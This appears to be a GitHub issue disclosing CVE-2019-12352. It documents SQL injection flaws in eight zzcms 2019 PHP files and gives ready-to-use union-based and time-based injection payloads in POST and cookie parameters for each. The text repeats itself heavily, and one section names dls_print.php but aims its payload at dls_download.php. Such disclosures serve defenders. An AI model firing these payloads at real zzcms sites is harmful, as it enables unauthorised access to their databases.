Headline
CVE-2019-12352: zzcms 2019 SQL INJECTION LIST · Issue #5 · cby234/zzcms
An issue was discovered in zzcms 2019. There is a SQL injection Vulnerability in /dl/dl_sendmail.php (when the attacker has dls_print authority) via a dlid cookie.
- user/dls_print.php
0x01 Vulnerability (/user/dls_print.php line 51 ~ 56)
If index of ‘,’ value in id parameter is not false sql will be
When we check the query there is no single quote to id parameter. So We can inject
any query with id parameter
We can find there is no security filter for id parameter and it means we can inject Sql query via
id parameter if we concat ‘,’ value at the end of id parameter
0x02 payload
give below “POC” value for post data in “/user/dls_download.php”
POC : union SQL injection
menu1=%3Fb%3D123%26province%3D%26city%3D%26keyword%3D%26page_size%3D2&FileExt=
xls&sql=select+count%28*%29+as+total+from+zzcms_dl+where+classid%3D1+&chkAll=checkbox
&id%5B%5D=1) union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,version(),0,1,2,3-- a,
- user/dls_download.php
0x01 Vulnerability (/user/dls_download.php line 43 ~ 46)
If index of ‘,’ value in id parameter is not false sql will be
When we check the query there is no single quote to id parameter. So We can inject
any query with id parameter
We can find there is no security filter for id parameter and it means we can inject Sql query via
id parameter if we concat ‘,’ value at the end of id parameter
0x02 payload
give below “POC” value for post data in “/user/dls_download.php”
POC : union SQL injection
menu1=%3Fb%3D123%26province%3D%26city%3D%26keyword%3D%26page_size%3D2&FileExt=
xls&sql=select+count%28*%29+as+total+from+zzcms_dl+where+classid%3D1+&chkAll=checkbox
&id%5B%5D=1) union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,version(),0,1,2,3-- a,
- dl/dl_sendmail.php
0x01 Vulnerability (/dl/dl_sendmail.php line 69 ~ 73)
If index of ‘,’ value in COOKIE[‘dlid’] parameter is bigger than 0 sql will be
When we check the query there is no single quote to COOKIE[‘dlid’] parameter. So We can inject
any query with COOKIE[‘dlid’] parameter
n var will get value via GET[‘n’] and if n var value is not 0 php does not make dlid COOKIE
value. So We can inject any query if we give any value without 0 via GET[‘n’] parameter
0x02 payload
give below “POC” value for cookie data in “/dl/dl_sendmail.php?n=1234"
POC : Time based sql injection
COOKIE[‘dlid’] = 1) union select sleep(3)-- a,
- dl/dl_sendsms.php
0x01 Vulnerability (/dl/dl_sendsms.php line 73 ~ 77)
If index of ‘,’ value in COOKIE[‘dlid’] parameter is bigger than 0 sql will be
When we check the query there is no single quote to COOKIE[‘dlid’] parameter. So We can inject
any query with COOKIE[‘dlid’] parameter
n var will get value via GET[‘n’] and if n var value is not 0 php does not make dlid COOKIE
Value. So We can inject any query if we give any value without 0 via GET[‘n’] parameter
0x02 payload
give below “POC” value for cookie data in “/dl/dl_sendsms.php?n=1234"
POC : Time based sql injection
COOKIE[‘dlid’] = 1) union select sleep(3)-- a,
- admin/deluser.php
0x01 Vulnerability (/admin/deluser.php line 28 ~ 32)
If index of ‘,’ value in id parameter is bigger than 0 sql will be
When we check the query there is no single quote to id parameter. So We can inject
any query with id parameter
We can find there is no security filter for id parameter and it means we can inject Sql query via
id parameter if we concat ‘,’ value at the end of id parameter
0x02 payload
give below “POC” value for post data in “/admin/deluser.php "
POC : union sql injection
tablename=zzcms_main&id[0]=1) union select 1234,@@version-- a,
- admin/dl_sendmail.php
0x01 Vulnerability (/admin/dl_sendmail.php line 32 ~ 36)
If index of ‘,’ value in id parameter is bigger than 0 sql will be
When we check the query there is no single quote to id parameter. So We can inject
any query with id parameter
We can find there is no security filter for id parameter and it means we can inject Sql query via
id parameter if we concat ‘,’ value at the end of id parameter
0x02 payload
give below “POC” value for post data in “/admin/dl_sendmail.php "
POC : union Time base sql injection
id[0]=1) union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,sleep(3)-- a,
- admin/showbad.php
0x01 Vulnerability (/admin/showbad.php line 26 ~ 32)
If index of ‘,’ value in id parameter is bigger than 0 sql will be
When we check the query there is no single quote to id parameter. So We can inject
any query with id parameter
We can find there is no security filter for id parameter and it means we can inject Sql query via
id parameter if we concat ‘,’ value at the end of id parameter
0x02 payload
give below “POC” value for post data in “/admin/showbad.php?action=del "
POC : Time base sql injection
id[0]=2342342) || IF((1=1),sleep(3),2)-- a,
- admin/ztliuyan_sendmail.php
0x01 Vulnerability (/admin/ztliuyan_sendmail.php line 31 ~ 36)
If index of ‘,’ value in id parameter is bigger than 0 sql will be
When we check the query there is no single quote to id parameter. So We can inject
any query with id parameter
We can find there is no security filter for id parameter and it means we can inject Sql query via
id parameter if we concat ‘,’ value at the end of id parameter
0x02 payload
give below “POC” value for post data in “/admin/ztliuyan_sendmail.php"
POC : union Time base sql injection
id[0]=2342342) union select 1,2,3,4,5,6,7,8,9,sleep(2)-- a,